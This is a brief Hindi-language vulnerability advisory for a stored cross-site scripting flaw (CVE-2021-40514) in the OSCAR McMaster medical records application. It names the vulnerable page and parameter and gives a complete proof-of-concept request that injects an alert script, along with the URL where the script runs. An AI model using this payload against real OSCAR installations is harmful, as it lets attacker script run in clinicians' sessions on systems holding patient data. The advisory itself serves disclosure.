
CVE-2021-40514 OSCAR McMaster 19.40~1235 संग्रहीत क्रॉस-साइट स्क्रिप्टिंग भेद्यता।
OSCAR McMaster एप्लिकेशन के संस्करण 19.40~1235 के कई पृष्ठों में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग भेद्यता मौजूद है, जो JavaScript कमांड्स के मनमाने निष्पादन की अनुमति देती है।
[CVE mitre के लिए प्लेसहोल्डर]
संवेदनशील JSP पृष्ठ:
providercontrol.jsp - mygroupno पैरामीटर
उदाहरण संवेदनशील पेलोड:
/oscar/provider/providercontrol.jsp?provider_no=999998&start_hour=8&end_hour=18&every_min=15&color_template=deepblue&dboperation=updatepreference&displaymode=updatepreference&default_servicetype=&prescriptionQrCodes=false&erx_enable=false&erx_training_mode=false&mygroup_no=%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E&programId_oscarView=0
संग्रहीत प्रतिक्रिया निम्नलिखित लिंक में उपयोगकर्ता के विरुद्ध निष्पादित की जाती है:
/oscar/provider/providercontrol.jsp?year=2021&month=8&day=1&view=0&displaymode=month&dboperation=searchappointmentmonth
जैक मैकब्राइड द्वारा खोजा गया, अगस्त 2021